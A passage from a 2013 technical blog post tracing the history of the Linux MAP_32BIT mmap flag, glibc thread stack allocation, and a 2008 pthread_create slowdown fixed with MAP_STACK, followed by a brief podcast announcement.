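  /* step 3: create the thread; it runs on the stack we allocated */
  pthread_t tid;
  if (pthread_create(&tid, &attr, worker, NULL) != 0) {
    perror("pthread_create");
    return EXIT_FAILURE;
  }

  pthread_join(tid, NULL);
  pthread_attr_destroy(&attr);
  munmap(stack, stack_size);
  return EXIT_SUCCESS;
}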

Slow context switches, glibc, thread local storage, … wow …

A lot of really crazy shit happened in 2003, so I will try my best to split it into digestible chunks.

Slow context switching on AMD k8

On February 12, 2003, it was reported that early AMD K8 CPUs were very slow when executing the wrmsr instruction. This instruction is used to write to model specific registers (MSRs). It was used a few times in context switch code, and removing it would help speed up context switch time. This code was refactored, but the data gathered here would be used as justification for using MAP_32BIT in glibc a few months later.

MAP_32BIT being introduced to glibc

On March 4, 2003, it appears that Ulrich Drepper added code to glibc to use the MAP_32BIT flag. As far as I can tell, this was the first time MAP_32BIT was introduced to glibc [2].

An interesting comment is presented with a small piece of the patch:

+/* For Linux/x86-64 we have one extra requirement: the stack must be
+   in the first 4GB.  Otherwise the segment register base address is
+   not wide enough.  */
+#define EXTRA_PARAM_CHECKS \
+  if ((uintptr_t) stackaddr > 0x100000000ul                                  \
+      || (uintptr_t) stackaddr + stacksize > 0x100000000ul)                  \
+    /* We cannot handle that stack address.  */                                      \
+    return EINVAL

To understand this comment it is important to understand how Linux deals with thread local storage.

Briefly,

  • Each thread has a thread control block (TCB) that contains various internal information that nptl needs, including some data that can be used to access thread local storage.
  • The TCB is written to the start of the thread stack by nptl.
  • The address of the TCB (and thus the thread stack) needs to be stored in such a way that nptl, code generated by gcc, and the kernel can access the thread control block of the currently running thread. In other words, it needs to be context switch friendly.
  • The register set of Intel processors is saved and restored each time a context switch occurs.
  • Saving the address of the TCB in a register would be ideal.

x86 and x86_64 processors are notorious for not having many registers available; however, Linux does not use the FS and GS segment selectors for segmentation. So, the address of the TCB can be stored in FS or GS if it will fit.

Unfortunately, the segment selectors FS and GS can only store 32-bit addresses and this is why Ulrich added the above code. Addresses above 4gb could not be stored in FS or GS.

It appears that this comment is correct for all of the Linux 2.4 series kernels and all Linux 2.5 kernels less than 2.5.65. On these kernel versions, only the segment selector is used for storing the thread stack address and as a result no thread stack above 4gb can be stored.

32-bit and 64-bit thread stacks

Starting with Linux 2.5.65 (and more practically, Linux 2.6.0), support for both 32-bit and 64-bit thread stacks had made its way into the kernel. 32-bit thread stacks would be stored in a segment selector while 64-bit thread stack addresses would be stored in a model specific register (MSR).

Unfortunately, as was reported back on February 12, 2003, writing to MSRs is painfully slow on early AMD K8 processors. To avoid writing to an MSR, you would need to supply a 32-bit thread stack address, and thus Ulrich added the following code to glibc on May 9, 2003:

+/* We prefer to have the stack allocated in the low 4GB since this
+   allows faster context switches.  */
+#define ARCH_MAP_FLAGS MAP_32BIT
+
+/* If it is not possible to allocate memory there retry without that
+   flag.  */
+#define ARCH_RETRY_MMAP(size) \
+  mmap (NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC,                              \
+       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)
+
+

This code is interesting for two reasons:

  1. The justification for using MAP_32BIT has changed from the kernel not supporting addresses above 4gb to decreasing context switch cost.
  2. A retry mechanism is added so that if no memory is available when using MAP_32BIT, a thread stack will be allocated somewhere else.

At some point in 2003 (unknown to me exactly when), MAP_32BIT had been restricted, as explained earlier, to deal with the ELF small code model in the AMD64 ABI.

The end result is that user programs have only 1gb of space in which to allocate all of their thread stacks (or any other low memory requested with MAP_32BIT).

This seems bad.

Fast forward to 2008: a bug

On August 13, 2008 an individual named “Pardo” from Google posted a message to the Linux kernel mailing list about a regression in pthread_create:

mmap() is slow on MAP_32BIT allocation failure, sometimes causing
NPTL’s pthread_create() to run about three orders of magnitude slower.
As example, in one case creating new threads goes from about 35,000
cycles up to about 25,000,000 cycles — which is under 100 threads per
second.

Pardo had filled the 1gb region that MAP_32BIT tries to use for thread stacks, causing glibc to fall back to the retry mechanism that Drepper added back in 2003.

Unfortunately, the failing mmap call with MAP_32BIT was doing a linear fucking search of all the “low address space” memory regions trying to find a fit before falling back and calling mmap a second time without MAP_32BIT.

And so after a few thousand threads, every new pthread_create call would trigger two system calls, the first of which would do a linear search of low memory before failing. The linear search and retry dramatically increased the time to create new threads.

This is pretty bad.

bugfixes for the kernel and glibc

So, how did glibc and the kernel fix this problem?

Ingo Molnar convinced everyone that the best solution was to add a new flag to the Linux kernel called MAP_STACK. This flag would be defined as “give out an address that is best suited for process/thread stacks”. This flag would actually be ignored by the kernel. This change appeared in Linux kernel 2.6.27 and was added on August 13, 2008.

Ulrich Drepper updated glibc to use MAP_STACK instead of MAP_32BIT and he removed the retry mechanism he added in 2003 since MAP_STACK should always succeed if there is any memory available. This change was added on August 15, 2008.

MAP_32BIT cannot be removed from the kernel, unfortunately, because there are many programs out in the wild (older versions of glibc, XFree86, older versions of ocamlc) that rely on this flag existing in order to work.

And so, MAP_32BIT will remain. A misnamed, strange looking wart that will probably be around forever to remind us that computers are hard.

Bad research (or not)?

I recall reading a paper from back in the 2005-2008 time period that benchmarked thread creation time, claimed that the time to create new threads increased as the number of threads increased, and concluded that threads were therefore bad.

I can’t seem to find that paper and it is currently 3:51 AM PST, so, who knows, I could be misremembering things. If someone knows what paper I am talking about, please let me know.

If such a paper exists (and I think it does), this blog post explains why thread creation benchmarks would have resulted in really bad looking graphs.

Conclusion

I really don’t even know what to say, but:

  • Computers are hard
  • Ripping the face off of bugs like this is actually pretty fun
  • Be careful when adding linear time searches to potential hot paths
  • Make sure to carefully read and consider the effects of low level code
  • Git is your friend and you should use it to find data about things from years long gone
  • Any complicated application, kernel, or whatever will have a large number of ugly scars and warts that cannot be changed to maintain backward compatibility. Such is life.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. http://web.archiveorange.com/archive/v/iv9U0zrDmBRAagTHyhHz
  2. The sha for this change is 0de28d5c71a3b58857642b3d5d804a790d9f6981, for those who are curious to read more.

Written by Joe Damato

May 6th, 2013 at 4:13 am

Posted in bugfix,linux

realtalk.io: a podcast for technical discussion

James Golick and I have released the inaugural episode of our new, highly technical podcast realtalk.io.

We will be doing frequent technical deep dives and releasing our conversations raw and unedited with all errors, omissions, awkward pauses, and curse words intact.

Check out the website, tune in, and subscribe.

Written by Joe Damato

April 28th, 2013 at 10:23 pm

Posted in Uncategorized